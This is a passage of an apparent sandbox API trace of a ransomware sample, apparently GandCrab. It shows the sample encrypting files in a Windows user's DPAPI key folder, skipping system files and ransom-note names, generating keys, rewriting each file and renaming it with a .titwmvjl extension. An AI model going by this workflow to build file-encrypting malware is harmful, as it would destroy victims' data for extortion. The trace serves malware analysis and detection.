(lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\15d22704-736b-416f-a36b-857f2a5d2a7e") returned 138 [0073.069] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\15d22704-736b-416f-a36b-857f2a5d2a7e") returned 138 [0073.069] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\15d22704-736b-416f-a36b-857f2a5d2a7e") returned 138 [0073.069] lstrcmpiW (lpString1="15d22704-736b-416f-a36b-857f2a5d2a7e", lpString2="desktop.ini") returned -1 [0073.069] lstrcmpiW (lpString1="15d22704-736b-416f-a36b-857f2a5d2a7e", lpString2="autorun.inf") returned -1 [0073.069] lstrcmpiW (lpString1="15d22704-736b-416f-a36b-857f2a5d2a7e", lpString2="ntuser.dat") returned -1 [0073.069] lstrcmpiW (lpString1="15d22704-736b-416f-a36b-857f2a5d2a7e", lpString2="iconcache.db") returned -1 [0073.069] lstrcmpiW (lpString1="15d22704-736b-416f-a36b-857f2a5d2a7e", lpString2="bootsect.bak") returned -1 [0073.069] lstrcmpiW (lpString1="15d22704-736b-416f-a36b-857f2a5d2a7e", lpString2="boot.ini") returned -1 [0073.069] lstrcmpiW (lpString1="15d22704-736b-416f-a36b-857f2a5d2a7e", lpString2="ntuser.dat.log") returned -1 [0073.069] lstrcmpiW (lpString1="15d22704-736b-416f-a36b-857f2a5d2a7e", lpString2="thumbs.db") returned -1 [0073.069] lstrcmpiW (lpString1="15d22704-736b-416f-a36b-857f2a5d2a7e", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0073.069] lstrcmpiW (lpString1="15d22704-736b-416f-a36b-857f2a5d2a7e", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0073.069] lstrcmpiW (lpString1="15d22704-736b-416f-a36b-857f2a5d2a7e", lpString2="KRAB-DECRYPT.html") returned -1 [0073.069] lstrcmpiW (lpString1="15d22704-736b-416f-a36b-857f2a5d2a7e", lpString2="CRAB-DECRYPT.html") returned -1 [0073.069] lstrcmpiW (lpString1="15d22704-736b-416f-a36b-857f2a5d2a7e", lpString2="KRAB-DECRYPT.txt") returned -1 [0073.069] lstrcmpiW (lpString1="15d22704-736b-416f-a36b-857f2a5d2a7e", lpString2="CRAB-DECRYPT.txt") returned -1 [0073.069] lstrcmpiW (lpString1="15d22704-736b-416f-a36b-857f2a5d2a7e", lpString2="ntldr") returned -1 [0073.069] lstrcmpiW (lpString1="15d22704-736b-416f-a36b-857f2a5d2a7e", lpString2="NTDETECT.COM") returned -1 [0073.069] lstrcmpiW (lpString1="15d22704-736b-416f-a36b-857f2a5d2a7e", lpString2="Bootfont.bin") returned -1 [0073.069] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\15d22704-736b-416f-a36b-857f2a5d2a7e") returned 138 [0073.069] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0073.070] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\15d22704-736b-416f-a36b-857f2a5d2a7e" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-1462094071-1423818996-289466292-1000\\15d22704-736b-416f-a36b-857f2a5d2a7e"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2cc [0073.070] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0073.070] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.071] CryptAcquireContextW (in: phProv=0x259e950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e950*=0x4cdb38) returned 1 [0073.071] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0073.071] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0073.071] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0073.071] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259e9dc | out: pbBuffer=0x259e9dc) returned 1 [0073.071] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.072] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0073.072] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.072] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.072] CryptAcquireContextW (in: phProv=0x259e950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e950*=0x4cdb38) returned 1 [0073.072] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0073.072] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0073.073] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0073.073] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259e9fc | out: pbBuffer=0x259e9fc) returned 1 [0073.073] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.073] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0073.073] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.073] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.073] CryptAcquireContextW (in: phProv=0x259e944, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e944*=0x4cdb38) returned 1 [0073.073] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.074] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e948 | out: phKey=0x259e948*=0x5033f8) returned 1 [0073.074] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.074] CryptGetKeyParam (in: hKey=0x5033f8, dwParam=0x8, pbData=0x259e93c, pdwDataLen=0x259e940, dwFlags=0x0 | out: pbData=0x259e93c*=0x800, pdwDataLen=0x259e940*=0x4) returned 1 [0073.074] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.074] CryptEncrypt (in: hKey=0x5033f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259e974*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259e974*=0x100) returned 1 [0073.074] GetLastError () returned 0x0 [0073.074] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.074] CryptDestroyKey (hKey=0x5033f8) returned 1 [0073.074] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.075] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0073.075] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.075] CryptAcquireContextW (in: phProv=0x259e944, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e944*=0x4cdb38) returned 1 [0073.075] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.075] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e948 | out: phKey=0x259e948*=0x5031f8) returned 1 [0073.075] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.075] CryptGetKeyParam (in: hKey=0x5031f8, dwParam=0x8, pbData=0x259e93c, pdwDataLen=0x259e940, dwFlags=0x0 | out: pbData=0x259e93c*=0x800, pdwDataLen=0x259e940*=0x4) returned 1 [0073.076] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.076] CryptEncrypt (in: hKey=0x5031f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259e974*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259e974*=0x100) returned 1 [0073.076] GetLastError () returned 0x0 [0073.076] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.076] CryptDestroyKey (hKey=0x5031f8) returned 1 [0073.076] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.076] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0073.076] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2640000 [0073.076] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2750000 [0073.077] ReadFile (in: hFile=0x2cc, lpBuffer=0x2640000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259ea20, lpOverlapped=0x0 | out: lpBuffer=0x2640000*, lpNumberOfBytesRead=0x259ea20*=0x1d4, lpOverlapped=0x0) returned 1 [0073.084] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0xfffffe2c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.084] WriteFile (in: hFile=0x2cc, lpBuffer=0x2750000*, nNumberOfBytesToWrite=0x1d4, lpNumberOfBytesWritten=0x259ea04, lpOverlapped=0x0 | out: lpBuffer=0x2750000*, lpNumberOfBytesWritten=0x259ea04*=0x1d4, lpOverlapped=0x0) returned 1 [0073.085] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0073.085] WriteFile (in: hFile=0x2cc, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259ea04, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259ea04*=0x21c, lpOverlapped=0x0) returned 1 [0073.087] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.091] VirtualFree (lpAddress=0x2750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.091] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.091] CloseHandle (hObject=0x2cc) returned 1 [0073.092] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\15d22704-736b-416f-a36b-857f2a5d2a7e" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-1462094071-1423818996-289466292-1000\\15d22704-736b-416f-a36b-857f2a5d2a7e"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\15d22704-736b-416f-a36b-857f2a5d2a7e.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-1462094071-1423818996-289466292-1000\\15d22704-736b-416f-a36b-857f2a5d2a7e.titwmvjl"), dwFlags=0x1) returned 1 [0073.093] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.093] FindNextFileW (in: hFindFile=0x5037b8, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0073.093] lstrcmpW (lpString1="496f2c5b-a90f-4380-b805-3bf6ac63451b", lpString2=".") returned 1 [0073.093] lstrcmpW (lpString1="496f2c5b-a90f-4380-b805-3bf6ac63451b", lpString2="..") returned 1 [0073.093] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\", lpString2="496f2c5b-a90f-4380-b805-3bf6ac63451b" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\496f2c5b-a90f-4380-b805-3bf6ac63451b") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\496f2c5b-a90f-4380-b805-3bf6ac63451b" [0073.093] lstrlenW (lpString=".titwmvjl") returned 9 [0073.093] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\496f2c5b-a90f-4380-b805-3bf6ac63451b") returned 138 [0073.093] VirtualAlloc (lpAddress=0x0, dwSize=0x154, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0073.093] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\496f2c5b-a90f-4380-b805-3bf6ac63451b.titwmvjl") returned 147 [0073.093] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\496f2c5b-a90f-4380-b805-3bf6ac63451b") returned 138 [0073.093] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\496f2c5b-a90f-4380-b805-3bf6ac63451b") returned 138 [0073.093] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\496f2c5b-a90f-4380-b805-3bf6ac63451b") returned 138 [0073.093] lstrcmpiW (lpString1="496f2c5b-a90f-4380-b805-3bf6ac63451b", lpString2="desktop.ini") returned -1 [0073.093] lstrcmpiW (lpString1="496f2c5b-a90f-4380-b805-3bf6ac63451b", lpString2="autorun.inf") returned -1 [0073.093] lstrcmpiW (lpString1="496f2c5b-a90f-4380-b805-3bf6ac63451b", lpString2="ntuser.dat") returned -1 [0073.093] lstrcmpiW (lpString1="496f2c5b-a90f-4380-b805-3bf6ac63451b", lpString2="iconcache.db") returned -1 [0073.093] lstrcmpiW (lpString1="496f2c5b-a90f-4380-b805-3bf6ac63451b", lpString2="bootsect.bak") returned -1 [0073.093] lstrcmpiW (lpString1="496f2c5b-a90f-4380-b805-3bf6ac63451b", lpString2="boot.ini") returned -1 [0073.094] lstrcmpiW (lpString1="496f2c5b-a90f-4380-b805-3bf6ac63451b", lpString2="ntuser.dat.log") returned -1 [0073.094] lstrcmpiW (lpString1="496f2c5b-a90f-4380-b805-3bf6ac63451b", lpString2="thumbs.db") returned -1 [0073.094] lstrcmpiW (lpString1="496f2c5b-a90f-4380-b805-3bf6ac63451b", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0073.094] lstrcmpiW (lpString1="496f2c5b-a90f-4380-b805-3bf6ac63451b", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0073.094] lstrcmpiW (lpString1="496f2c5b-a90f-4380-b805-3bf6ac63451b", lpString2="KRAB-DECRYPT.html") returned -1 [0073.094] lstrcmpiW (lpString1="496f2c5b-a90f-4380-b805-3bf6ac63451b", lpString2="CRAB-DECRYPT.html") returned -1 [0073.094] lstrcmpiW (lpString1="496f2c5b-a90f-4380-b805-3bf6ac63451b", lpString2="KRAB-DECRYPT.txt") returned -1 [0073.094] lstrcmpiW (lpString1="496f2c5b-a90f-4380-b805-3bf6ac63451b", lpString2="CRAB-DECRYPT.txt") returned -1 [0073.094] lstrcmpiW (lpString1="496f2c5b-a90f-4380-b805-3bf6ac63451b", lpString2="ntldr") returned -1 [0073.094] lstrcmpiW (lpString1="496f2c5b-a90f-4380-b805-3bf6ac63451b", lpString2="NTDETECT.COM") returned -1 [0073.094] lstrcmpiW (lpString1="496f2c5b-a90f-4380-b805-3bf6ac63451b", lpString2="Bootfont.bin") returned -1 [0073.094] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\496f2c5b-a90f-4380-b805-3bf6ac63451b") returned 138 [0073.094] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0073.094] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\496f2c5b-a90f-4380-b805-3bf6ac63451b" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-1462094071-1423818996-289466292-1000\\496f2c5b-a90f-4380-b805-3bf6ac63451b"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2cc [0073.094] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0073.094] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.095] CryptAcquireContextW (in: phProv=0x259e950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e950*=0x4cdb38) returned 1 [0073.095] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0073.095] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0073.095] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0073.095] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259e9dc | out: pbBuffer=0x259e9dc) returned 1 [0073.095] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.096] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0073.096] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.096] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.096] CryptAcquireContextW (in: phProv=0x259e950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e950*=0x4cdb38) returned 1 [0073.096] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0073.096] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0073.097] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0073.097] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259e9fc | out: pbBuffer=0x259e9fc) returned 1 [0073.097] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.097] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0073.097] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.097] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.097] CryptAcquireContextW (in: phProv=0x259e944, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e944*=0x4cdb38) returned 1 [0073.098] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.098] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e948 | out: phKey=0x259e948*=0x503578) returned 1 [0073.098] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.098] CryptGetKeyParam (in: hKey=0x503578, dwParam=0x8, pbData=0x259e93c, pdwDataLen=0x259e940, dwFlags=0x0 | out: pbData=0x259e93c*=0x800, pdwDataLen=0x259e940*=0x4) returned 1 [0073.098] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.098] CryptEncrypt (in: hKey=0x503578, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259e974*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259e974*=0x100) returned 1 [0073.098] GetLastError () returned 0x0 [0073.098] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.099] CryptDestroyKey (hKey=0x503578) returned 1 [0073.099] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.099] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0073.099] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.099] CryptAcquireContextW (in: phProv=0x259e944, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e944*=0x4cdb38) returned 1 [0073.099] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.099] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e948 | out: phKey=0x259e948*=0x503938) returned 1 [0073.099] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.100] CryptGetKeyParam (in: hKey=0x503938, dwParam=0x8, pbData=0x259e93c, pdwDataLen=0x259e940, dwFlags=0x0 | out: pbData=0x259e93c*=0x800, pdwDataLen=0x259e940*=0x4) returned 1 [0073.100] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.100] CryptEncrypt (in: hKey=0x503938, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259e974*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259e974*=0x100) returned 1 [0073.100] GetLastError () returned 0x0 [0073.100] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.100] CryptDestroyKey (hKey=0x503938) returned 1 [0073.100] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.101] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0073.101] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2640000 [0073.101] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2750000 [0073.101] ReadFile (in: hFile=0x2cc, lpBuffer=0x2640000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259ea20, lpOverlapped=0x0 | out: lpBuffer=0x2640000*, lpNumberOfBytesRead=0x259ea20*=0x1d4, lpOverlapped=0x0) returned 1 [0073.108] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0xfffffe2c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.108] WriteFile (in: hFile=0x2cc, lpBuffer=0x2750000*, nNumberOfBytesToWrite=0x1d4, lpNumberOfBytesWritten=0x259ea04, lpOverlapped=0x0 | out: lpBuffer=0x2750000*, lpNumberOfBytesWritten=0x259ea04*=0x1d4, lpOverlapped=0x0) returned 1 [0073.109] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0073.109] WriteFile (in: hFile=0x2cc, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259ea04, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259ea04*=0x21c, lpOverlapped=0x0) returned 1 [0073.120] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.124] VirtualFree (lpAddress=0x2750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.124] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.124] CloseHandle (hObject=0x2cc) returned 1 [0073.126] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\496f2c5b-a90f-4380-b805-3bf6ac63451b" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-1462094071-1423818996-289466292-1000\\496f2c5b-a90f-4380-b805-3bf6ac63451b"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\496f2c5b-a90f-4380-b805-3bf6ac63451b.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-1462094071-1423818996-289466292-1000\\496f2c5b-a90f-4380-b805-3bf6ac63451b.titwmvjl"), dwFlags=0x1) returned 1 [0073.126] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.126] FindNextFileW (in: hFindFile=0x5037b8, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0073.126] lstrcmpW (lpString1="5b8a3202-35dc-4437-b5d7-374f5e872415", lpString2=".") returned 1 [0073.126] lstrcmpW (lpString1="5b8a3202-35dc-4437-b5d7-374f5e872415", lpString2="..") returned 1 [0073.126] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\", lpString2="5b8a3202-35dc-4437-b5d7-374f5e872415" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\5b8a3202-35dc-4437-b5d7-374f5e872415") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\5b8a3202-35dc-4437-b5d7-374f5e872415" [0073.127] lstrlenW (lpString=".titwmvjl") returned 9 [0073.127] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\5b8a3202-35dc-4437-b5d7-374f5e872415") returned 138 [0073.127] VirtualAlloc (lpAddress=0x0, dwSize=0x154, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0073.127] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\5b8a3202-35dc-4437-b5d7-374f5e872415.titwmvjl") returned 147 [0073.127] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\5b8a3202-35dc-4437-b5d7-374f5e872415") returned 138 [0073.127] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\5b8a3202-35dc-4437-b5d7-374f5e872415") returned 138 [0073.127] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\5b8a3202-35dc-4437-b5d7-374f5e872415") returned 138 [0073.127] lstrcmpiW (lpString1="5b8a3202-35dc-4437-b5d7-374f5e872415", lpString2="desktop.ini") returned -1 [0073.127] lstrcmpiW (lpString1="5b8a3202-35dc-4437-b5d7-374f5e872415", lpString2="autorun.inf") returned -1 [0073.127] lstrcmpiW (lpString1="5b8a3202-35dc-4437-b5d7-374f5e872415", lpString2="ntuser.dat") returned -1 [0073.127] lstrcmpiW (lpString1="5b8a3202-35dc-4437-b5d7-374f5e872415", lpString2="iconcache.db") returned -1 [0073.127] lstrcmpiW (lpString1="5b8a3202-35dc-4437-b5d7-374f5e872415", lpString2="bootsect.bak") returned -1 [0073.127] lstrcmpiW (lpString1="5b8a3202-35dc-4437-b5d7-374f5e872415", lpString2="boot.ini") returned -1 [0073.127] lstrcmpiW (lpString1="5b8a3202-35dc-4437-b5d7-374f5e872415", lpString2="ntuser.dat.log") returned -1 [0073.127] lstrcmpiW (lpString1="5b8a3202-35dc-4437-b5d7-374f5e872415", lpString2="thumbs.db") returned -1 [0073.127] lstrcmpiW (lpString1="5b8a3202-35dc-4437-b5d7-374f5e872415", 